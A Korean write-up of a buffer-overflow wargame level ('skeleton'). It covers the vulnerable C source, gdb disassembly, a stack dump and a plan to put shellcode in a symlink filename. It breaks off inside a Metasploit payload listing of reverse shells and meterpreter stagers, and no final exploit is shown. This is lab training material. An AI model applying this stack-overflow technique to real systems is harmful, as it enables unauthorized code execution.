BOF 원정대 – Level 10 (skeleton)

문제 소스는 아래와 같다.

/*
 The Lord of the BOF : The Fellowship of the BOF
- skeleton
- argv hunter
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

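/*
 * Level entry point. This is the challenge's deliberately vulnerable
 * target, so the overflow is left exactly as shipped; only the string
 * literals lost in extraction are restored and the return type made
 * explicit.
 *
 * As compiled (see the disassembly): every environment string is
 * wiped, argv[1][47] must be 0xbf, argv[1] is capped at 48 bytes,
 * then copied into a 40-byte buffer, after which the buffer and every
 * argv string are zeroed before main returns.
 *
 * Returns 0 on the normal path; exit(0) on any rejected input.
 */
int main(int argc, char *argv[])
{
    char buffer[40];
    int i, saved_argc;

    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }

    /* egghunter: erase every environment string so nothing can be
     * staged in the environment. Only the contents are cleared; the
     * environ[] pointers themselves stay intact. */
    for (i = 0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));

    /* buffer lives at ebp-0x28, so argv[1][44..47] lands on the saved
     * return address and byte 47 is its most significant byte: forcing
     * it to 0xbf restricts the return target to the 0xbfxxxxxx stack
     * region. Note this index is read before the length check below,
     * so an argument shorter than 48 bytes is read out of bounds here. */
    if (argv[1][47] != '\xbf') {
        printf("stack is still your friend.\n");
        exit(0);
    }

    /* check the length of argument: strlen() excludes the NUL, so a
     * 48-byte argument still makes strcpy() write 49 bytes. */
    if (strlen(argv[1]) > 48) {
        printf("argument is too long!\n");
        exit(0);
    }

    /* argc saver: argv[] is wiped at the end, so keep the count now */
    saved_argc = argc;

    /* The overflow: up to 49 bytes into a 40-byte buffer. Bytes 40..43
     * overwrite the saved EBP, 44..47 the return address. */
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

    /* buffer hunter: the copied payload is destroyed before returning */
    memset(buffer, 0, 40);

    /* ultra argv hunter!: every argv string, argv[0] included, is zeroed.
     * The executable path the kernel placed at the top of the stack is
     * not referenced by argv[] or environ[], so it survives this. */
    for (i = 0; i < saved_argc; i++)
        memset(argv[i], 0, strlen(argv[i]));
}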

코드를 보면 환경변수, argv, 버퍼가 모두 지워지므로 이 셋 중 어느 곳에도 쉘코드를 둘 수 없음을 알 수 있다. 또한 buffer가 ebp-0x28에 있으므로 argv[1]의 44~47번째 바이트가 리턴 주소를 덮는데, 그중 최상위 바이트인 argv[1][47]을 0xbf로 제한하고 있기 때문에 리턴 주소는 0xbfxxxxxx 영역(스택)만 가리킬 수 있다. 아래 스택 덤프의 0x40013868, 0x4000ae60 등에서 보이듯 libc는 0x40xxxxxx에 매핑되어 있으므로 RTL처럼 라이브러리로 돌아가는 공격 또한 불가능하다. 그래서 우선 디버깅을 해보기로 했다.

[vampire@localhost vampire]$ gdb skeleton_tmp
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i386-redhat-linux...
(gdb) disassemble main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %esp,%ebp
0x8048503 <main+3>: sub $0x30,%esp
0x8048506 <main+6>: cmpl $0x1,0x8(%ebp)
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push $0x80486d0
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add $0x4,%esp
0x8048519 <main+25>: push $0x0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add $0x4,%esp
0x8048523 <main+35>: nop 
0x8048524 <main+36>: movl $0x0,0xffffffd4(%ebp)
0x804852b <main+43>: nop 
0x804852c <main+44>: lea 0x0(%esi,1),%esi
0x8048530 <main+48>: mov 0xffffffd4(%ebp),%eax
0x8048533 <main+51>: lea 0x0(,%eax,4),%edx
0x804853a <main+58>: mov 0x8049804,%eax
0x804853f <main+63>: cmpl $0x0,(%eax,%edx,1)
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov 0xffffffd4(%ebp),%eax
0x804854a <main+74>: lea 0x0(,%eax,4),%edx
0x8048551 <main+81>: mov 0x8049804,%eax
0x8048556 <main+86>: mov (%eax,%edx,1),%edx
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0 <strlen>
0x804855f <main+95>: add $0x4,%esp
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push $0x0
0x8048567 <main+103>: mov 0xffffffd4(%ebp),%eax
0x804856a <main+106>: lea 0x0(,%eax,4),%edx
0x8048571 <main+113>: mov 0x8049804,%eax
0x8048576 <main+118>: mov (%eax,%edx,1),%edx
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430 <memset>
0x804857f <main+127>: add $0xc,%esp
0x8048582 <main+130>: incl 0xffffffd4(%ebp)
---Type <return> to continue, or q <return> to quit---
0x8048585 <main+133>: jmp 0x8048530 <main+48>
0x8048587 <main+135>: mov 0xc(%ebp),%eax
0x804858a <main+138>: add $0x4,%eax
0x804858d <main+141>: mov (%eax),%edx
0x804858f <main+143>: add $0x2f,%edx
0x8048592 <main+146>: cmpb $0xbf,(%edx)
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push $0x80486dc
0x804859c <main+156>: call 0x8048410 <printf>
0x80485a1 <main+161>: add $0x4,%esp
0x80485a4 <main+164>: push $0x0
0x80485a6 <main+166>: call 0x8048420 <exit>
0x80485ab <main+171>: add $0x4,%esp
0x80485ae <main+174>: mov %esi,%esi
0x80485b0 <main+176>: mov 0xc(%ebp),%eax
0x80485b3 <main+179>: add $0x4,%eax
0x80485b6 <main+182>: mov (%eax),%edx
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: call 0x80483f0 <strlen>
0x80485be <main+190>: add $0x4,%esp
0x80485c1 <main+193>: mov %eax,%eax
0x80485c3 <main+195>: cmp $0x30,%eax
0x80485c6 <main+198>: jbe 0x80485e0 <main+224>
0x80485c8 <main+200>: push $0x80486f9
0x80485cd <main+205>: call 0x8048410 <printf>
0x80485d2 <main+210>: add $0x4,%esp
0x80485d5 <main+213>: push $0x0
0x80485d7 <main+215>: call 0x8048420 <exit>
0x80485dc <main+220>: add $0x4,%esp
0x80485df <main+223>: nop 
0x80485e0 <main+224>: mov 0x8(%ebp),%eax
0x80485e3 <main+227>: mov %eax,0xffffffd0(%ebp)
0x80485e6 <main+230>: mov 0xc(%ebp),%eax
0x80485e9 <main+233>: add $0x4,%eax
0x80485ec <main+236>: mov (%eax),%edx
0x80485ee <main+238>: push %edx
0x80485ef <main+239>: lea 0xffffffd8(%ebp),%eax
0x80485f2 <main+242>: push %eax
0x80485f3 <main+243>: call 0x8048440 <strcpy>
0x80485f8 <main+248>: add $0x8,%esp
---Type <return> to continue, or q <return> to quit---
0x80485fb <main+251>: lea 0xffffffd8(%ebp),%eax
0x80485fe <main+254>: push %eax
0x80485ff <main+255>: push $0x8048710
0x8048604 <main+260>: call 0x8048410 <printf>
0x8048609 <main+265>: add $0x8,%esp
0x804860c <main+268>: push $0x28
0x804860e <main+270>: push $0x0
0x8048610 <main+272>: lea 0xffffffd8(%ebp),%eax
0x8048613 <main+275>: push %eax
0x8048614 <main+276>: call 0x8048430 <memset>
0x8048619 <main+281>: add $0xc,%esp
0x804861c <main+284>: movl $0x0,0xffffffd4(%ebp)
0x8048623 <main+291>: mov 0xffffffd4(%ebp),%eax
0x8048626 <main+294>: cmp 0xffffffd0(%ebp),%eax
0x8048629 <main+297>: jl 0x8048630 <main+304>
0x804862b <main+299>: jmp 0x8048670 <main+368>
0x804862d <main+301>: lea 0x0(%esi),%esi
0x8048630 <main+304>: mov 0xffffffd4(%ebp),%eax
0x8048633 <main+307>: lea 0x0(,%eax,4),%edx
0x804863a <main+314>: mov 0xc(%ebp),%eax
0x804863d <main+317>: mov (%eax,%edx,1),%edx
0x8048640 <main+320>: push %edx
0x8048641 <main+321>: call 0x80483f0 <strlen>
0x8048646 <main+326>: add $0x4,%esp
0x8048649 <main+329>: mov %eax,%eax
0x804864b <main+331>: push %eax
0x804864c <main+332>: push $0x0
0x804864e <main+334>: mov 0xffffffd4(%ebp),%eax
0x8048651 <main+337>: lea 0x0(,%eax,4),%edx
0x8048658 <main+344>: mov 0xc(%ebp),%eax
0x804865b <main+347>: mov (%eax,%edx,1),%edx
0x804865e <main+350>: push %edx
0x804865f <main+351>: call 0x8048430 <memset>
0x8048664 <main+356>: add $0xc,%esp
0x8048667 <main+359>: incl 0xffffffd4(%ebp)
0x804866a <main+362>: jmp 0x8048623 <main+291>
0x804866c <main+364>: lea 0x0(%esi,1),%esi
0x8048670 <main+368>: leave 
0x8048671 <main+369>: ret 
0x8048672 <main+370>: nop 
---Type <return> to continue, or q <return> to quit---
0x8048673 <main+371>: nop 
0x8048674 <main+372>: nop 
0x8048675 <main+373>: nop 
0x8048676 <main+374>: nop 
0x8048677 <main+375>: nop 
0x8048678 <main+376>: nop 
0x8048679 <main+377>: nop 
0x804867a <main+378>: nop 
0x804867b <main+379>: nop 
0x804867c <main+380>: nop 
0x804867d <main+381>: nop 
0x804867e <main+382>: nop 
0x804867f <main+383>: nop 
End of assembler dump.
(gdb) b main+369
Junk at end of arguments.
(gdb) b *main+369
Breakpoint 1 at 0x8048671
(gdb) r `python -c "print '\xbf'*48"`
Starting program: /home/vampire/skeleton_tmp `python -c "print '\xbf'*48"`

Breakpoint 1, 0x8048671 in main ()
(gdb) x/32wx $esp
0xbffffadc: 0xbfbfbfbf 0x00000000 0xbffffb24 0xbffffb30
0xbffffaec: 0x40013868 0x00000002 0x08048450 0x00000000
0xbffffafc: 0x08048471 0x08048500 0x00000002 0xbffffb24
0xbffffb0c: 0x08048390 0x080486ac 0x4000ae60 0xbffffb1c
0xbffffb1c: 0x40013e90 0x00000002 0xbffffc1d 0xbffffc38
0xbffffb2c: 0x00000000 0xbffffc69 0xbffffc7b 0xbffffc94
0xbffffb3c: 0xbffffcb3 0xbffffcd5 0xbffffce2 0xbffffea5
0xbffffb4c: 0xbffffec4 0xbffffee1 0xbffffef6 0xbfffff15
(gdb)
0xbffffb5c: 0xbfffff20 0xbfffff30 0xbfffff38 0xbfffff49
0xbffffb6c: 0xbfffff53 0xbfffff61 0xbfffff72 0xbfffff80
0xbffffb7c: 0xbfffff8b 0xbfffff9e 0x00000000 0x00000003
0xbffffb8c: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffb9c: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffbac: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffbbc: 0x08048450 0x0000000b 0x000001fd 0x0000000c
0xbffffbcc: 0x000001fd 0x0000000d 0x000001fd 0x0000000e
(gdb)
0xbffffbdc: 0x000001fd 0x00000010 0x0febfbff 0x0000000f
0xbffffbec: 0xbffffc18 0x00000000 0x00000000 0x00000000
0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x36383669
0xbffffc1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc4c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffc5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffccc: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffcdc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd4c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffd5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdcc: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffddc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe4c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffebc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffecc: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffedc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffefc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff4c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffff5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffcc: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffffdc: 0x00000000 0x6f682f00 0x762f656d 0x69706d61
0xbfffffec: 0x732f6572 0x656c656b 0x5f6e6f74 0x00706d74
0xbffffffc: 0x00000000 Cannot access memory at address 0xc0000000
(gdb)
0xc0000004: Cannot access memory at address 0xc0000004
(gdb) x/s 0xbfffffdf
0xbfffffdf: \
(gdb)
0xbfffffe0: \
(gdb)
0xbfffffe1: /home/vampire/skeleton_tmp
(gdb)
0xbffffffc: \
(gdb)

스택의 맨 끝(0xbfffffe1)에서 실행 파일의 경로 문자열을 확인할 수 있었다. 문제 소스는 argv[0]을 포함한 모든 argv를 지우므로 이것은 argv[0]이 아니라, 커널이 execve 시 스택 최상단에 기록해 두는 실행 파일 경로로 보인다. 프로그램은 이 문자열을 가리키는 포인터를 갖고 있지 않으므로(argv[], environ[] 어느 쪽도 아님) 지워지지 않고 남는다. 따라서 파일명 자체를 쉘코드로 만들면 공격이 가능할 것으로 보인다. 덤프상 이 문자열은 0xbffffffb 바로 앞에서 끝나므로, 시작 주소는 대략 0xbffffffb − strlen(경로)로 계산할 수 있다.

파일명을 쉘코드로 만드는 가장 간단한 방법은 공격 대상 바이너리에 쉘코드를 이름으로 하는 심볼릭 링크를 거는 것이다. 몇 번의 시도 끝에 파일명에는 경로 구분자인 '\x2f'('/')를 넣을 수 없다는 사실을 알 수 있었다. 파일명은 C 문자열이므로 '\x00' 역시 들어갈 수 없다. 따라서 이 바이트들을 포함하지 않는 쉘코드가 필요하게 되었고, Metasploit의 인코더로 쉘코드를 한번 뽑아 보았다.

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #

 =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 638 exploits - 314 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
 =[ svn r11395 updated today (2010.12.22)

msf > show payloads

Payloads
========

 Name Disclosure Date Rank Description
---- --------------- ---- -----------
 aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
 aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
 aix/ppc/shell_interact normal AIX execve shell for inetd
 aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline
 bsd/sparc/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline
 bsd/sparc/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline
 bsd/x86/exec normal BSD Execute Command
 bsd/x86/metsvc_bind_tcp normal FreeBSD Meterpreter Service, Bind TCP
 bsd/x86/metsvc_reverse_tcp normal FreeBSD Meterpreter Service, Reverse TCP Inline
 bsd/x86/shell/bind_tcp normal BSD Command Shell, Bind TCP Stager
 bsd/x86/shell/find_tag normal BSD Command Shell, Find Tag Stager
 bsd/x86/shell/reverse_tcp normal BSD Command Shell, Reverse TCP Stager
 bsd/x86/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline
 bsd/x86/shell_find_port normal BSD Command Shell, Find Port Inline
 bsd/x86/shell_find_tag normal BSD Command Shell, Find Tag Inline
 bsd/x86/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline
 bsdi/x86/shell/bind_tcp normal BSDi Command Shell, Bind TCP Stager
 bsdi/x86/shell/reverse_tcp normal BSDi Command Shell, Reverse TCP Stager
 bsdi/x86/shell_bind_tcp normal BSDi Command Shell, Bind TCP Inline
 bsdi/x86/shell_find_port normal BSDi Command Shell, Find Port Inline
 bsdi/x86/shell_reverse_tcp normal BSDi Command Shell, Reverse TCP Inline
 cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
 cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat -e)
 cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
 cmd/unix/generic normal Unix Command, Generic command execution
 cmd/unix/interact normal Unix Command, Interact with established connection
 cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
 cmd/unix/reverse_bash normal Unix Command Shell, Reverse TCP (/dev/tcp)
 cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat -e)
 cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
 cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
 cmd/windows/adduser normal Windows Execute net user /ADD CMD
 cmd/windows/bind_perl normal Windows Command Shell, Bind TCP (via perl)
 cmd/windows/bind_ruby normal Windows Command Shell, Bind TCP (via Ruby)
 cmd/windows/download_exec_vbs normal Windows Executable Download and Execute (via .vbs)
 cmd/windows/reverse_perl normal Windows Command, Double reverse TCP connection (via perl)
 cmd/windows/reverse_ruby normal Windows Command Shell, Reverse TCP (via Ruby)
 generic/debug_trap normal Generic x86 Debug Trap
 generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
 generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
 generic/tight_loop normal Generic x86 Tight Loop
 java/jsp_shell_bind_tcp normal Java JSP Command Shell, Bind TCP Inline
 java/jsp_shell_reverse_tcp normal Java JSP Command Shell, Reverse TCP Inline
 java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP stager
 java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP stager
 java/shell/bind_tcp normal Command Shell, Java Bind TCP stager
 java/shell/reverse_tcp normal Command Shell, Java Reverse TCP stager
 linux/armle/exec normal Linux Execute Command
 linux/armle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/mipsbe/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/mipsle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/ppc/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
 linux/ppc/shell_find_port normal Linux Command Shell, Find Port Inline
 linux/ppc/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/ppc64/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
 linux/ppc64/shell_find_port normal Linux Command Shell, Find Port Inline
 linux/ppc64/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/x86/adduser normal Linux Add User
 linux/x86/chmod normal Linux Chmod
 linux/x86/exec normal Linux Execute Command
 linux/x86/meterpreter/bind_ipv6_tcp normal Linux Meterpreter, Bind TCP Stager (IPv6)
 linux/x86/meterpreter/bind_tcp normal Linux Meterpreter, Bind TCP Stager
 linux/x86/meterpreter/find_tag normal Linux Meterpreter, Find Tag Stager
 linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Meterpreter, Reverse TCP Stager (IPv6)
 linux/x86/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
 linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
 linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
 linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6)
 linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
 linux/x86/shell/find_tag normal Linux Command Shell, Find Tag Stager
 linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6)
 linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
 linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6)
 linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
 linux/x86/shell_find_port normal Linux Command Shell, Find Port Inline
 linux/x86/shell_find_tag normal Linux Command Shell, Find Tag Inline
 linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/x86/shell_reverse_tcp2 normal Linux Command Shell, Reverse TCP Inline - Metasm demo
 netware/shell/reverse_tcp normal NetWare Command Shell, Reverse TCP Stager
 osx/armle/execute/bind_tcp normal OSX Write and Execute Binary, Bind TCP Stager
 osx/armle/execute/reverse_tcp normal OSX Write and Execute Binary, Reverse TCP Stager
 osx/armle/shell/bind_tcp normal OSX Command Shell, Bind TCP Stager
 osx/armle/shell/reverse_tcp normal OSX Command Shell, Reverse TCP Stager
 osx/armle/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
 osx/armle/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
 osx/armle/vibrate normal OSX iPhone Vibrate
 osx/ppc/shell/bind_tcp normal OSX Command Shell, Bind TCP Stager
 osx/ppc/shell/find_tag normal OSX Command Shell, Find Tag Stager
 osx/ppc/shell/reverse_tcp normal OSX Command Shell, Reverse TCP Stager
 osx/ppc/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
 osx/ppc/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
 osx/x86/bundleinject/bind_tcp normal Mac OS X Inject Mach-O Bundle, Bind TCP Stager
 osx/x86/bundleinject/reverse_tcp normal Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
 osx/x86/exec normal OSX Execute Command
 osx/x86/isight/bind_tcp normal Mac OS X x86 iSight photo capture, Bind TCP Stager
 osx/x86/isight/reverse_tcp normal Mac OS X x86 iSight photo capture, Reverse TCP Stager
 osx/x86/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
 osx/x86/shell_find_port normal OSX Command Shell, Find Port Inline
 osx/x86/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
 osx/x86/vforkshell/bind_tcp normal OSX (vfork) Command Shell, Bind TCP Stager
 osx/x86/vforkshell/reverse_tcp normal OSX (vfork) Command Shell, Reverse TCP Stager
 osx/x86/vforkshell_bind_tcp normal OSX (vfork) Command Shell, Bind TCP Inline
 osx/x86/vforkshell_reverse_tcp normal OSX (vfork) Command Shell, Reverse TCP Inline
 php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
 php/bind_php normal PHP Command Shell, Bind TCP (via php)
 php/download_exec normal PHP Executable Download and Execute
 php/exec normal PHP Execute Command
 php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager
 php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP stager
 php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline
 php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
 php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
 php/shell_findsock normal PHP Command Shell, Find Sock
 solaris/sparc/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline
 solaris/sparc/shell_find_port normal Solaris Command Shell, Find Port Inline
 solaris/sparc/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline
 solaris/x86/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline
 solaris/x86/shell_find_port normal Solaris Command Shell, Find Port Inline
 solaris/x86/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline
 tty/unix/interact normal Unix TTY, Interact with established connection
 windows/adduser normal Windows Execute net user /ADD
 windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
 windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
 windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
 windows/dllinject/find_tag normal Reflective Dll Injection, Find Tag Ordinal Stager
 windows/dllinject/reverse_http normal Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
 windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
 windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
 windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
 windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
 windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
 windows/download_exec normal Windows Executable Download and Execute
 windows/exec normal Windows Execute Command
 windows/messagebox normal Windows MessageBox
 windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
 windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
 windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
 windows/meterpreter/find_tag normal Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
 windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
 windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
 windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
 windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
 windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
 windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
 windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
 windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
 windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
 windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
 windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
 windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
 windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
 windows/patchupdllinject/find_tag normal Windows Inject DLL, Find Tag Ordinal Stager
 windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
 windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
 windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
